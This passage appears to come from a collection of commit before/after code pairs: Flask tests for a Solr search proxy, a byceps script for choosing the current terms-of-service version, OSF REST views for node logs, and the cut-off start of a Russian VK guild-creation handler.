            self.assertEqual(r.json['responseHeader']['params']['hl.full.snippets'], ['4'])
            # hl.fragsize has a floor of 1 but otherwise passes through.
            r = self.client.get(
                url_for('search'),
                query_string={'q': 'star', 'hl.fragsize': '0'},
            )
            self.assertEqual(r.json['responseHeader']['params']['hl.fragsize'], ['1'])
            r = self.client.get(
                url_for('search'),
                query_string={'q': 'star', 'hl.fragsize': '50'},
            )
            self.assertEqual(r.json['responseHeader']['params']['hl.fragsize'], ['50'])
    def test_set_max_rows(self):
        """
        solr should only return up to a default number of documents multiplied
        by the user's ratelimit-level, if applicable
        """
        with MockSolrResponse(self.app.config.get('SOLR_SERVICE_SEARCH_HANDLER')):
            r = self.client.get(
                url_for('search'),
                query_string={'q': '*', 'rows': 10}
            )
            self.assertEqual(len(r.json['response']['docs']), 7)
            # Lower the cap: only 2 docs should come back now.
            self.app.config['SOLR_SERVICE_MAX_ROWS'] = 2
            r = self.client.get(
                url_for('search'),
                query_string={'q': '*', 'rows': 10}
            )
            self.assertEqual(len(r.json['response']['docs']), 2)
            # A higher ratelimit level raises the effective cap again.
            r = self.client.get(
                url_for('search'),
                query_string={'q': '*', 'rows': 10},
                headers={'X-Adsws-Ratelimit-Level': '10'}
            )
            self.assertEqual(len(r.json['response']['docs']), 7)
    def test_search(self):
        """
        Test the search endpoint
        """
        with MockSolrResponse(self.app.config['SOLR_SERVICE_SEARCH_HANDLER']):
            r = self.client.get(url_for('search'))
            self.assertIn('responseHeader', r.json)
    @httpretty.activate
    def test_qtree(self):
        """
        Test the qtree endpoint
        """
        httpretty.register_uri(
            httpretty.POST, self.app.config.get('SOLR_SERVICE_QTREE_HANDLER'),
            content_type='application/json',
            status=200,
            body=r'''{
            "qtree": "\n{\"name\":\"OPERATOR\", \"label\":\"DEFOP\", \"children\": [\n {\"name\":\"MODIFIER\", \"label\":\"MODIFIER\", \"children\": [\n {\"name\":\"TMODIFIER\", \"label\":\"TMODIFIER\", \"children\": [\n {\"name\":\"FIELD\", \"label\":\"FIELD\", \"children\": [\n {\"name\":\"QNORMAL\", \"label\":\"QNORMAL\", \"children\": [\n {\"name\":\"TERM_NORMAL\", \"input\":\"star\", \"start\":0, \"end\":3}]\n }]\n }]\n }]\n }]\n}",
            "responseHeader": {
            "status": 0,
            "QTime": 6,
            "params": {
            "q": "star",
            "wt": "json",
            "fl": "id"
            }
            }
            }'''
        )
        r = self.client.get(url_for('qtree'))
        self.assertEqual(r.status_code, 200)
        self.assertIn('qtree', r.json)
        self.assertIn('name', json.loads(r.json['qtree']))
        # POST is not an allowed method on the tvrh endpoint.
        r = self.client.post(url_for('tvrh'))
        self.assertStatus(r, 405)
    @httpretty.activate
    def test_tvrh(self):
        """
        Test the tvrh endpoint
        """
        httpretty.register_uri(
            httpretty.POST, self.app.config.get('SOLR_SERVICE_TVRH_HANDLER'),
            content_type='application/json',
            status=200,
            body="""
            {
            "responseHeader":{
            "status":0,
            "QTime":1,
            "params":{
            "fl":"title",
            "indent":"on",
            "start":"0",
            "q":"*:*",
            "tv":"true",
            "tv.all":"true",
            "tv.fl":"abstract",
            "wt":"json",
            "qt":"tvrh",
            "rows":"1"}},
            "response":{"numFound":10715572,"start":0,"docs":[
            {
            "title":["The Structure of Convection in the Planetary Boundary -"]}]
            },
            "termVectors":[
            "uniqueKeyFieldName","id",
            "374878",[
            "uniqueKey","374878"]]}
            """
        )
        resp = self.client.get(url_for('tvrh'))
        self.assertEqual(resp.status_code, 200)
        self.assertIn('termVectors', resp.json)
    @httpretty.activate
    def test_bigquery(self):
        """
        Test the bigquery endpoint
        """
        # Fail if the query parameters did not survive the proxying; otherwise
        # echo method and uri so assertions can inspect what was sent.
        def request_callback(request, uri, headers):
            if 'q' not in request.querystring:
                return 500, headers, "{'The query parameters were not passed properly'}"
            return 200, \
                headers, \
                "The {0} response from {1}".format(
                    request.method, uri
                )
        httpretty.register_uri(
            httpretty.POST, self.app.config.get('SOLR_SERVICE_BIGQUERY_HANDLER'),
            body=request_callback)
        bibcodes = 'bibcode\n1907AN....174...59.\n1908PA.....16..445.\n1989LNP...334..242S'
        resp = self.client.post(
            url_for('bigquery'),
            content_type='multipart/form-data',
            data={
                'q': '*:*',
                'fl': 'bibcode',
                'fq': '{!bitset}',
                'file_field': (StringIO(bibcodes), 'big-query/csv')
            }
        )
        self.assertEqual(resp.status_code, 200)
        # Missing 'fq' parameter
        resp = self.client.post(
            url_for('bigquery'),
            content_type='multipart/form-data',
            data={
                'q': '*:*',
                'fl': 'bibcode',
                'file_field': (StringIO(bibcodes), 'big-query/csv'),
            }
        )
        self.assertEqual(resp.status_code, 200)
        self.assertTrue('bitset' in resp.data)
        # 'fq' without bitset
        resp = self.client.post(
            url_for('bigquery'),
            content_type='multipart/form-data',
            data={
                'q': '*:*',
                'fl': 'bibcode',
                'fq': '{compression = true}',
                'file_field': (StringIO(bibcodes), 'big-query/csv'),
            }
        )
        self.assertEqual(resp.status_code, 200)
        self.assertTrue('compression' in resp.data)
        self.assertTrue('bitset' in resp.data)
        # We only allow one content stream to be sent
        data = MultiDict([
            ('q', '*:*'),
            ('fl', 'bibcode'),
            ('fq', '{!bitset}'),
            ('file_field', (StringIO(bibcodes), 'big-query/csv')),
            ('file_field', (StringIO(bibcodes), 'big-query/csv')),
        ])
        resp = self.client.post(
            url_for('bigquery'),
            content_type='multipart/form-data',
            data=data
        )
        self.assertEqual(resp.status_code, 400)
        self.assertEqual(resp.json['error'],
                         'You can only pass one content stream.')
if __name__ == '__main__':
    # Allow running this test module directly with the stdlib runner.
    unittest.main()
Update test_solr.py
import sys, os
PROJECT_HOME = os.path.abspath(os.path.join(os.path.dirname(__file__), '../../'))
sys.path.append(PROJECT_HOME)
from flask.ext.testing import TestCase
from flask import url_for
import unittest
import httpretty
import json
import app
from werkzeug.security import gen_salt
from werkzeug.datastructures import MultiDict
from StringIO import StringIO
from ..mocks import MockSolrResponse
from views import SolrInterface
class TestSolrInterface(TestCase):
    """Unit tests for the SolrInterface helper."""

    def create_app(self):
        """Start the wsgi application"""
        return app.create_app()

    def test_cleanup_solr_request(self):
        """
        Simple test of the cleanup classmethod
        """
        cleaned = SolrInterface.cleanup_solr_request({'fl': ['*,bibcode,title']})
        # The wildcard must have been stripped from the cleaned 'fl' value.
        self.assertNotIn('*', cleaned['fl'])
class TestWebservices(TestCase):
    """End-to-end tests of the HTTP endpoints (search, qtree, tvrh, bigquery),
    with the backing solr instance faked via httpretty or MockSolrResponse."""
    def create_app(self):
        """Start the wsgi application"""
        _ = app.create_app()
        return _
    @httpretty.activate
    def test_cookie_forwarding(self):
        """
        Test that cookies get properly passed by the SolrInterface
        """
        # Echo back the proxied request's cookie header so the response body
        # reveals exactly what was forwarded to solr.
        def request_callback(request, uri, headers):
            return 200, headers, request.headers.get('cookie')
        httpretty.register_uri(
            httpretty.POST, self.app.config.get('SOLR_SERVICE_SEARCH_HANDLER'),
            body=request_callback,
        )
        with self.client as c:
            cookie_value = gen_salt(200)
            # This cookie should be forwarded
            c.set_cookie(
                'localhost',
                self.app.config.get("SOLR_SERVICE_FORWARD_COOKIE_NAME"),
                cookie_value
            )
            # This cookie should not be forwarded
            c.set_cookie(
                'localhost',
                'cookie_name',
                'cookie_value'
            )
            r = c.get(url_for('search'), query_string={'q': 'star'})
            # One and only one cookie
            self.assertEqual(len(r.data.split('=')), 2)
            # This forwarded cookie should match the one we gave originally
            rcookie_value = r.data.split('=')[1]
            self.assertEqual(rcookie_value, cookie_value)
    def test_disallowed_fields(self):
        """
        disallowed fields should be absent from the solr response
        """
        with MockSolrResponse(self.app.config.get('SOLR_SERVICE_SEARCH_HANDLER')):
            # Explicitly ask for the disallowed fields alongside allowed ones.
            fl = 'title,id,abstract,{}'.format(
                ','.join(self.app.config['SOLR_SERVICE_DISALLOWED_FIELDS'])
            )
            r = self.client.get(
                url_for('search'),
                query_string={'q': 'star', 'fl': fl},
            )
            for doc in r.json['response']['docs']:
                self.assertIn('title', doc)
                self.assertIn('id', doc)
                self.assertIn('abstract', doc)
                for field in self.app.config['SOLR_SERVICE_DISALLOWED_FIELDS']:
                    self.assertNotIn(field, doc)
    def test_cleanup_params(self):
        """
        Certain parameters have limits
        """
        with MockSolrResponse(self.app.config.get('SOLR_SERVICE_SEARCH_HANDLER')):
            # hl.snippets / hl.full.snippets get capped at 4.
            r = self.client.get(
                url_for('search'),
                query_string={'q': 'star', 'hl.snippets': 10},
            )
            self.assertEqual(r.json['responseHeader']['params']['hl.snippets'], ['4'])
            r = self.client.get(
                url_for('search'),
                query_string={'q': 'star', 'hl.snippets': 14, 'hl.full.snippets': 10},
            )
            self.assertEqual(r.json['responseHeader']['params']['hl.snippets'], ['4'])
            self.assertEqual(r.json['responseHeader']['params']['hl.full.snippets'], ['4'])
            # hl.fragsize has a floor of 1 but otherwise passes through.
            r = self.client.get(
                url_for('search'),
                query_string={'q': 'star', 'hl.fragsize': '0'},
            )
            self.assertEqual(r.json['responseHeader']['params']['hl.fragsize'], ['1'])
            r = self.client.get(
                url_for('search'),
                query_string={'q': 'star', 'hl.fragsize': '50'},
            )
            self.assertEqual(r.json['responseHeader']['params']['hl.fragsize'], ['50'])
    def test_set_max_rows(self):
        """
        solr should only return up to a default number of documents multiplied
        by the user's ratelimit-level, if applicable
        """
        with MockSolrResponse(self.app.config.get('SOLR_SERVICE_SEARCH_HANDLER')):
            r = self.client.get(
                url_for('search'),
                query_string={'q': '*', 'rows': 10}
            )
            self.assertEqual(len(r.json['response']['docs']), 7)
            # Lower the cap: only 2 docs should come back now.
            self.app.config['SOLR_SERVICE_MAX_ROWS'] = 2
            r = self.client.get(
                url_for('search'),
                query_string={'q': '*', 'rows': 10}
            )
            self.assertEqual(len(r.json['response']['docs']), 2)
            # A higher ratelimit level raises the effective cap again.
            r = self.client.get(
                url_for('search'),
                query_string={'q': '*', 'rows': 10},
                headers={'X-Adsws-Ratelimit-Level': '10'}
            )
            self.assertEqual(len(r.json['response']['docs']), 7)
    def test_search(self):
        """
        Test the search endpoint
        """
        with MockSolrResponse(self.app.config['SOLR_SERVICE_SEARCH_HANDLER']):
            r = self.client.get(url_for('search'))
            self.assertIn('responseHeader', r.json)
    @httpretty.activate
    def test_qtree(self):
        """
        Test the qtree endpoint
        """
        httpretty.register_uri(
            httpretty.POST, self.app.config.get('SOLR_SERVICE_QTREE_HANDLER'),
            content_type='application/json',
            status=200,
            body=r'''{
            "qtree": "\n{\"name\":\"OPERATOR\", \"label\":\"DEFOP\", \"children\": [\n {\"name\":\"MODIFIER\", \"label\":\"MODIFIER\", \"children\": [\n {\"name\":\"TMODIFIER\", \"label\":\"TMODIFIER\", \"children\": [\n {\"name\":\"FIELD\", \"label\":\"FIELD\", \"children\": [\n {\"name\":\"QNORMAL\", \"label\":\"QNORMAL\", \"children\": [\n {\"name\":\"TERM_NORMAL\", \"input\":\"star\", \"start\":0, \"end\":3}]\n }]\n }]\n }]\n }]\n}",
            "responseHeader": {
            "status": 0,
            "QTime": 6,
            "params": {
            "q": "star",
            "wt": "json",
            "fl": "id"
            }
            }
            }'''
        )
        r = self.client.get(url_for('qtree'))
        self.assertEqual(r.status_code, 200)
        self.assertIn('qtree', r.json)
        self.assertIn('name', json.loads(r.json['qtree']))
        # POST is not an allowed method on the tvrh endpoint.
        r = self.client.post(url_for('tvrh'))
        self.assertStatus(r, 405)
    @httpretty.activate
    def test_tvrh(self):
        """
        Test the tvrh endpoint
        """
        httpretty.register_uri(
            httpretty.POST, self.app.config.get('SOLR_SERVICE_TVRH_HANDLER'),
            content_type='application/json',
            status=200,
            body="""
            {
            "responseHeader":{
            "status":0,
            "QTime":1,
            "params":{
            "fl":"title",
            "indent":"on",
            "start":"0",
            "q":"*:*",
            "tv":"true",
            "tv.all":"true",
            "tv.fl":"abstract",
            "wt":"json",
            "qt":"tvrh",
            "rows":"1"}},
            "response":{"numFound":10715572,"start":0,"docs":[
            {
            "title":["The Structure of Convection in the Planetary Boundary -"]}]
            },
            "termVectors":[
            "uniqueKeyFieldName","id",
            "374878",[
            "uniqueKey","374878"]]}
            """
        )
        resp = self.client.get(url_for('tvrh'))
        self.assertEqual(resp.status_code, 200)
        self.assertIn('termVectors', resp.json)
    @httpretty.activate
    def test_bigquery(self):
        """
        Test the bigquery endpoint
        """
        # Fail if the query parameters did not survive the proxying; otherwise
        # echo method and uri so assertions can inspect what was sent.
        def request_callback(request, uri, headers):
            if 'q' not in request.querystring:
                return 500, headers, "{'The query parameters were not passed properly'}"
            return 200, \
                headers, \
                "The {0} response from {1}".format(
                    request.method, uri
                )
        httpretty.register_uri(
            httpretty.POST, self.app.config.get('SOLR_SERVICE_BIGQUERY_HANDLER'),
            body=request_callback)
        bibcodes = 'bibcode\n1907AN....174...59.\n1908PA.....16..445.\n1989LNP...334..242S'
        resp = self.client.post(
            url_for('bigquery'),
            content_type='multipart/form-data',
            data={
                'q': '*:*',
                'fl': 'bibcode',
                'fq': '{!bitset}',
                'file_field': (StringIO(bibcodes), 'big-query/csv')
            }
        )
        self.assertEqual(resp.status_code, 200)
        # Missing 'fq' parameter
        resp = self.client.post(
            url_for('bigquery'),
            content_type='multipart/form-data',
            data={
                'q': '*:*',
                'fl': 'bibcode',
                'file_field': (StringIO(bibcodes), 'big-query/csv'),
            }
        )
        self.assertEqual(resp.status_code, 200)
        self.assertTrue('bitset' in resp.data)
        # 'fq' without bitset
        resp = self.client.post(
            url_for('bigquery'),
            content_type='multipart/form-data',
            data={
                'q': '*:*',
                'fl': 'bibcode',
                'fq': '{compression = true}',
                'file_field': (StringIO(bibcodes), 'big-query/csv'),
            }
        )
        self.assertEqual(resp.status_code, 200)
        self.assertTrue('compression' in resp.data)
        self.assertTrue('bitset' in resp.data)
        # We only allow one content stream to be sent
        data = MultiDict([
            ('q', '*:*'),
            ('fl', 'bibcode'),
            ('fq', '{!bitset}'),
            ('file_field', (StringIO(bibcodes), 'big-query/csv')),
            ('file_field', (StringIO(bibcodes), 'big-query/csv')),
        ])
        resp = self.client.post(
            url_for('bigquery'),
            content_type='multipart/form-data',
            data=data
        )
        self.assertEqual(resp.status_code, 400)
        self.assertEqual(resp.json['error'],
                         'You can only pass one content stream.')
# Allow running this test module directly (instead of via a test runner).
if __name__ == '__main__':
    unittest.main()
|
#!/usr/bin/env python
"""Set the current version of the terms of service for a brand.
:Copyright: 2006-2019 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
from typing import Dict, List, Optional
import click
from pick import pick
from byceps.services.terms.models.version import Version
from byceps.services.terms.transfer.models import VersionID
from byceps.services.terms import version_service
from byceps.util.datetime.format import format_datetime_short
from byceps.util.system import get_config_filename_from_env_or_exit
from _util import app_context
from _validators import validate_brand
@click.command()
@click.argument('brand', callback=validate_brand)
def execute(brand):
    # Interactively select one of the brand's terms-of-service versions and
    # make it the current one.
    versions = version_service.get_versions_for_brand(brand.id)
    # NOTE(review): current_version_id may be None when no current version
    # has been set yet; _request_version_id must tolerate that.
    current_version_id = version_service.find_current_version_id(brand.id)
    versions_by_id = {v.id: v for v in versions}
    # Ask user which version to set as the current one.
    selected_version_id = _request_version_id(versions_by_id,
                                              current_version_id)
    # Set current version.
    version_service.set_current_version(brand.id, selected_version_id)
    # Confirm update to user.
    selected_version_title = versions_by_id[selected_version_id].title
    click.secho(
        'Current version for brand ID "{}" was set to "{}".'.format(
            brand.id, selected_version_title),
        fg='green')
def _request_version_id(versions_by_id: Dict[VersionID, Version],
                        current_version_id: Optional[VersionID]
                       ) -> VersionID:
    """Show an interactive picker of all versions (newest first) and
    return the ID of the version the user selects.

    The currently set version is pre-selected; if no current version is
    set, the latest version is pre-selected instead.
    """
    version_ids = _get_version_ids_latest_first(versions_by_id)

    def get_option_title(version_id):
        version = versions_by_id[version_id]
        return '"{}"\t\t{}'.format(
            version.title, format_datetime_short(version.created_at))

    # A brand may not have a current version yet; guard against
    # `list.index(None)` raising ValueError in that case.
    if current_version_id is not None:
        current_version_option_index = version_ids.index(current_version_id)
    else:
        current_version_option_index = 0

    selection = pick(
        version_ids,
        title='Choose version to set as the current one:',
        options_map_func=get_option_title,
        default_index=current_version_option_index)

    # pick() returns an (option, index) pair; only the option is needed.
    return selection[0]
def _get_version_ids_latest_first(versions_by_id: Dict[VersionID, Version]
                                 ) -> List[VersionID]:
    """Return all version IDs ordered from newest to oldest."""
    ordered = sorted(versions_by_id.values(),
                     key=lambda version: version.created_at,
                     reverse=True)
    return [version.id for version in ordered]
if __name__ == '__main__':
    # Load the app configuration and run the command inside an app context.
    config_filename = get_config_filename_from_env_or_exit()
    with app_context(config_filename):
        execute()
Handle current terms version not being set
#!/usr/bin/env python
"""Set the current version of the terms of service for a brand.
:Copyright: 2006-2019 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
from typing import Dict, List, Optional
import click
from pick import pick
from byceps.services.terms.models.version import Version
from byceps.services.terms.transfer.models import VersionID
from byceps.services.terms import version_service
from byceps.util.datetime.format import format_datetime_short
from byceps.util.system import get_config_filename_from_env_or_exit
from _util import app_context
from _validators import validate_brand
@click.command()
@click.argument('brand', callback=validate_brand)
def execute(brand):
    # Interactively select one of the brand's terms-of-service versions and
    # make it the current one.
    versions = version_service.get_versions_for_brand(brand.id)
    # May be None when no current version has been set for the brand yet;
    # _request_version_id handles that case.
    current_version_id = version_service.find_current_version_id(brand.id)
    versions_by_id = {v.id: v for v in versions}
    # Ask user which version to set as the current one.
    selected_version_id = _request_version_id(versions_by_id,
                                              current_version_id)
    # Set current version.
    version_service.set_current_version(brand.id, selected_version_id)
    # Confirm update to user.
    selected_version_title = versions_by_id[selected_version_id].title
    click.secho(
        'Current version for brand ID "{}" was set to "{}".'.format(
            brand.id, selected_version_title),
        fg='green')
def _request_version_id(versions_by_id: Dict[VersionID, Version],
                        current_version_id: Optional[VersionID]
                       ) -> VersionID:
    """Present an interactive picker of all versions (newest first) and
    return the ID of the version the user chooses.
    """
    version_ids = _get_version_ids_latest_first(versions_by_id)

    def format_option(version_id):
        version = versions_by_id[version_id]
        created = format_datetime_short(version.created_at)
        return '"{}"\t\t{}'.format(version.title, created)

    # Pre-select the current version, or the latest one if none is set.
    default_index = (version_ids.index(current_version_id)
                     if current_version_id is not None
                     else 0)

    chosen_id, _option_index = pick(
        version_ids,
        title='Choose version to set as the current one:',
        options_map_func=format_option,
        default_index=default_index)

    return chosen_id
def _get_version_ids_latest_first(versions_by_id: Dict[VersionID, Version]
                                 ) -> List[VersionID]:
    """Return the IDs of all versions, newest first."""
    by_creation_desc = sorted(versions_by_id.values(),
                              key=lambda version: version.created_at,
                              reverse=True)
    return [version.id for version in by_creation_desc]
if __name__ == '__main__':
    # Load the app configuration and run the command inside an app context.
    config_filename = get_config_filename_from_env_or_exit()
    with app_context(config_filename):
        execute()
|
from rest_framework import generics, permissions as drf_permissions
from rest_framework.exceptions import NotFound
from website.models import NodeLog
from framework.auth.oauth_scopes import CoreScopes
from api.base.filters import ODMFilterMixin
from api.base.utils import get_user_auth, get_object_or_error
from api.base import permissions as base_permissions
from api.nodes.serializers import NodeSerializer
from api.logs.serializers import NodeLogSerializer
from api.base.views import JSONAPIBaseView
class LogNodeList(JSONAPIBaseView, generics.ListAPIView, ODMFilterMixin):
    """List of nodes that a given log is associated with. *Read-only*.

    Paginated list of nodes that the user contributes to. Each resource contains the full representation of the node,
    meaning additional requests to an individual node's detail view are not necessary. If the user id in the path is the
    same as the logged-in user, all nodes will be visible. Otherwise, you will only be able to see the other user's
    publicly-visible nodes. The special user id `me` can be used to represent the currently logged-in user.

    ##Node Attributes

    <!--- Copied Attributes from NodeDetail -->

    OSF Node entities have the "nodes" `type`.

        name           type               description
        ---------------------------------------------------------------------------------
        title          string             title of project or component
        description    string             description of the node
        category       string             node category, must be one of the allowed values
        date_created   iso8601 timestamp  timestamp that the node was created
        date_modified  iso8601 timestamp  timestamp when the node was last updated
        tags           array of strings   list of tags that describe the node
        registration   boolean            has this project been registered?
        collection     boolean            is this node a collection of other nodes?
        dashboard      boolean            is this node visible on the user dashboard?
        public         boolean            has this node been made publicly-visible?

    ##Links

    See the [JSON-API spec regarding pagination](http://jsonapi.org/format/1.0/#fetching-pagination).

    ##Actions

    *None*.

    ##Query Params

    + `page=<Int>` -- page number of results to view, default 1

    + `filter[<fieldname>]=<Str>` -- fields and values to filter the search results on.

    <!--- Copied Query Params from NodeList -->

    Nodes may be filtered by their `title`, `category`, `description`, `public`, `registration`, or `tags`. `title`,
    `description`, and `category` are string fields and will be filtered using simple substring matching. `public` and
    `registration` are booleans, and can be filtered using truthy values, such as `true`, `false`, `0`, or `1`. Note
    that quoting `true` or `false` in the query will cause the match to fail regardless. `tags` is an array of simple strings.

    #This Request/Response
    """
    permission_classes = (
        drf_permissions.IsAuthenticatedOrReadOnly,
        base_permissions.TokenHasScope,
    )

    # OAuth scopes: logs are read-only, so no write scope is granted.
    required_read_scopes = [CoreScopes.NODE_LOG_READ]
    required_write_scopes = [CoreScopes.NULL]

    serializer_class = NodeSerializer

    view_category = 'logs'
    view_name = 'log-nodes'

    # Default ordering: newest log entries first.
    order = ('-date', )

    def get_queryset(self):
        # Load the log named in the URL; 404 when no such log exists.
        log = NodeLog.load(self.kwargs.get('log_id'))
        if not log:
            raise NotFound(
                detail='No log matching that log_id could be found.'
            )
        else:
            # Only expose nodes the requesting user is permitted to view.
            auth_user = get_user_auth(self.request)
            return [
                node for node in log.node__logged
                if node.can_view(auth_user)
            ]
class NodeLogDetail(JSONAPIBaseView, generics.RetrieveAPIView):
    """Detail of a given log. *Read-only*.

    Note that if an anonymous view_only key is being used, the user relationship will not be exposed.

    ##Node Attributes

    <!--- Copied Attributes from NodeDetail -->

    OSF Node entities have the "nodes" `type`.

        name           type               description
        ---------------------------------------------------------------------------------
        title          string             title of project or component
        description    string             description of the node
        category       string             node category, must be one of the allowed values
        date_created   iso8601 timestamp  timestamp that the node was created
        date_modified  iso8601 timestamp  timestamp when the node was last updated
        tags           array of strings   list of tags that describe the node
        registration   boolean            has this project been registered?
        collection     boolean            is this node a collection of other nodes?
        dashboard      boolean            is this node visible on the user dashboard?
        public         boolean            has this node been made publicly-visible?

    ##Links

    See the [JSON-API spec regarding pagination](http://jsonapi.org/format/1.0/#fetching-pagination).

    ##Actions

    *None*.

    ##Query Params

    + `page=<Int>` -- page number of results to view, default 1

    + `filter[<fieldname>]=<Str>` -- fields and values to filter the search results on.

    <!--- Copied Query Params from NodeList -->

    Nodes may be filtered by their `title`, `category`, `description`, `public`, `registration`, or `tags`. `title`,
    `description`, and `category` are string fields and will be filtered using simple substring matching. `public` and
    `registration` are booleans, and can be filtered using truthy values, such as `true`, `false`, `0`, or `1`. Note
    that quoting `true` or `false` in the query will cause the match to fail regardless. `tags` is an array of simple strings.

    #This Request/Response
    """
    permission_classes = (
        drf_permissions.IsAuthenticatedOrReadOnly,
        base_permissions.TokenHasScope,
    )

    required_read_scopes = [CoreScopes.NODE_BASE_READ]
    required_write_scopes = [CoreScopes.NODE_BASE_WRITE]

    serializer_class = NodeLogSerializer

    view_category = 'logs'
    view_name = 'log-detail'

    # overrides RetrieveAPIView
    def get_object(self):
        # get_object_or_error raises NotFound for an unknown log id.
        log = get_object_or_error(
            NodeLog,
            self.kwargs['log_id'],
            display_name='log'
        )
        # May raise a permission denied
        self.check_object_permissions(self.request, log)
        return log

    # overrides DestroyAPIView-style hooks; logs cannot be deleted, so this
    # is deliberately a no-op.
    def perform_destroy(self, instance):
        pass
Add LogMixin for either getting the log or raising NotFound.
from rest_framework import generics, permissions as drf_permissions
from rest_framework.exceptions import NotFound
from website.models import NodeLog
from framework.auth.oauth_scopes import CoreScopes
from api.base.filters import ODMFilterMixin
from api.base.utils import get_user_auth, get_object_or_error
from api.base import permissions as base_permissions
from api.nodes.serializers import NodeSerializer
from api.users.serializers import UserSerializer
from api.logs.serializers import NodeLogSerializer
from api.base.views import JSONAPIBaseView
class LogMixin(object):
    """Mixin providing ``get_log``, which loads the log named by the
    ``log_id`` URL kwarg or raises 404.
    """
    def get_log(self):
        loaded_log = NodeLog.load(self.kwargs.get('log_id'))
        if not loaded_log:
            raise NotFound(detail='No log matching that log_id could be found.')
        return loaded_log
class LogNodeList(JSONAPIBaseView, generics.ListAPIView, ODMFilterMixin, LogMixin):
    """List of nodes that a given log is associated with. *Read-only*.

    Paginated list of nodes that the user contributes to. Each resource contains the full representation of the node,
    meaning additional requests to an individual node's detail view are not necessary. If the user id in the path is the
    same as the logged-in user, all nodes will be visible. Otherwise, you will only be able to see the other user's
    publicly-visible nodes. The special user id `me` can be used to represent the currently logged-in user.

    ##Node Attributes

    <!--- Copied Attributes from NodeDetail -->

    OSF Node entities have the "nodes" `type`.

        name           type               description
        ---------------------------------------------------------------------------------
        title          string             title of project or component
        description    string             description of the node
        category       string             node category, must be one of the allowed values
        date_created   iso8601 timestamp  timestamp that the node was created
        date_modified  iso8601 timestamp  timestamp when the node was last updated
        tags           array of strings   list of tags that describe the node
        registration   boolean            has this project been registered?
        collection     boolean            is this node a collection of other nodes?
        dashboard      boolean            is this node visible on the user dashboard?
        public         boolean            has this node been made publicly-visible?

    ##Links

    See the [JSON-API spec regarding pagination](http://jsonapi.org/format/1.0/#fetching-pagination).

    ##Actions

    *None*.

    ##Query Params

    + `page=<Int>` -- page number of results to view, default 1

    + `filter[<fieldname>]=<Str>` -- fields and values to filter the search results on.

    <!--- Copied Query Params from NodeList -->

    Nodes may be filtered by their `title`, `category`, `description`, `public`, `registration`, or `tags`. `title`,
    `description`, and `category` are string fields and will be filtered using simple substring matching. `public` and
    `registration` are booleans, and can be filtered using truthy values, such as `true`, `false`, `0`, or `1`. Note
    that quoting `true` or `false` in the query will cause the match to fail regardless. `tags` is an array of simple strings.

    #This Request/Response
    """
    permission_classes = (
        drf_permissions.IsAuthenticatedOrReadOnly,
        base_permissions.TokenHasScope,
    )

    # OAuth scopes: logs are read-only, so no write scope is granted.
    required_read_scopes = [CoreScopes.NODE_LOG_READ]
    required_write_scopes = [CoreScopes.NULL]

    serializer_class = NodeSerializer

    view_category = 'logs'
    view_name = 'log-nodes'

    # Default ordering: newest log entries first.
    order = ('-date', )

    def get_queryset(self):
        # Use LogMixin.get_log() instead of duplicating the load-or-404
        # logic here (the mixin existed but was not used).
        log = self.get_log()
        # Only expose nodes the requesting user is permitted to view.
        auth_user = get_user_auth(self.request)
        return [
            node for node in log.node__logged
            if node.can_view(auth_user)
        ]
class NodeLogDetail(JSONAPIBaseView, generics.RetrieveAPIView):
    """Detail of a given log. *Read-only*.

    Note that if an anonymous view_only key is being used, the user relationship will not be exposed.

    ##Node Attributes

    <!--- Copied Attributes from NodeDetail -->

    OSF Node entities have the "nodes" `type`.

        name           type               description
        ---------------------------------------------------------------------------------
        title          string             title of project or component
        description    string             description of the node
        category       string             node category, must be one of the allowed values
        date_created   iso8601 timestamp  timestamp that the node was created
        date_modified  iso8601 timestamp  timestamp when the node was last updated
        tags           array of strings   list of tags that describe the node
        registration   boolean            has this project been registered?
        collection     boolean            is this node a collection of other nodes?
        dashboard      boolean            is this node visible on the user dashboard?
        public         boolean            has this node been made publicly-visible?

    ##Links

    See the [JSON-API spec regarding pagination](http://jsonapi.org/format/1.0/#fetching-pagination).

    ##Actions

    *None*.

    ##Query Params

    + `page=<Int>` -- page number of results to view, default 1

    + `filter[<fieldname>]=<Str>` -- fields and values to filter the search results on.

    <!--- Copied Query Params from NodeList -->

    Nodes may be filtered by their `title`, `category`, `description`, `public`, `registration`, or `tags`. `title`,
    `description`, and `category` are string fields and will be filtered using simple substring matching. `public` and
    `registration` are booleans, and can be filtered using truthy values, such as `true`, `false`, `0`, or `1`. Note
    that quoting `true` or `false` in the query will cause the match to fail regardless. `tags` is an array of simple strings.

    #This Request/Response
    """
    permission_classes = (
        drf_permissions.IsAuthenticatedOrReadOnly,
        base_permissions.TokenHasScope,
    )

    required_read_scopes = [CoreScopes.NODE_BASE_READ]
    required_write_scopes = [CoreScopes.NODE_BASE_WRITE]

    serializer_class = NodeLogSerializer

    view_category = 'logs'
    view_name = 'log-detail'

    # overrides RetrieveAPIView
    def get_object(self):
        # get_object_or_error raises NotFound for an unknown log id.
        log = get_object_or_error(
            NodeLog,
            self.kwargs['log_id'],
            display_name='log'
        )
        # May raise a permission denied
        self.check_object_permissions(self.request, log)
        return log

    # overrides DestroyAPIView-style hooks; logs cannot be deleted, so this
    # is deliberately a no-op.
    def perform_destroy(self, instance):
        pass
|
""" Создание гильдий """
from lib.object_creation import createGuild
from lib.guilds import Player, Guild
from lib.commands import ban_list
from lib.config import group_id
from topics.lib import Hyperlink, getPhoto, Fields
from topics.errors import GMError
from re import search
# NOTE(review): shadows the built-in id(); presumably the VK topic id this
# handler is attached to — confirm against the dispatcher.
id = 29891323
# Community (group) the topic belongs to.
group = group_id
# Number of comments processed per poll — TODO confirm semantics in caller.
comment_amount = 5


def getAction(text):
    # Every comment in this topic is treated as a guild-creation request.
    return makeGuild


def getResponse(request):
    # Summarize the asker's guild: name plus a link to its VK wiki page.
    player = Player(request.asker.get("id"))
    guild_name, page_id = player.guild.get("name", "page")
    link = "https://vk.com/page-{}_{}".format(group_id, page_id)
    return "Гильдия: {} ({})".format(guild_name, link)


def finish(request):
    # No post-processing is needed for this topic.
    pass
def makeGuild(request):
    # Parse the request text into guild fields, normalise them, validate,
    # and create the guild — unless the same guild (same name and head)
    # was already created by an earlier, duplicate submission.
    mandatory_keys, optional_keys = getKeys()
    fields = Fields(request.text, mandatory_keys, optional_keys)
    editFields(fields)
    makeHyperlinks(fields)
    editHeadsAndVices(fields)
    if not guildAlreadyExists(fields):
        checkGuildInfo(fields)
        createGuild(**fields)
def getKeys():
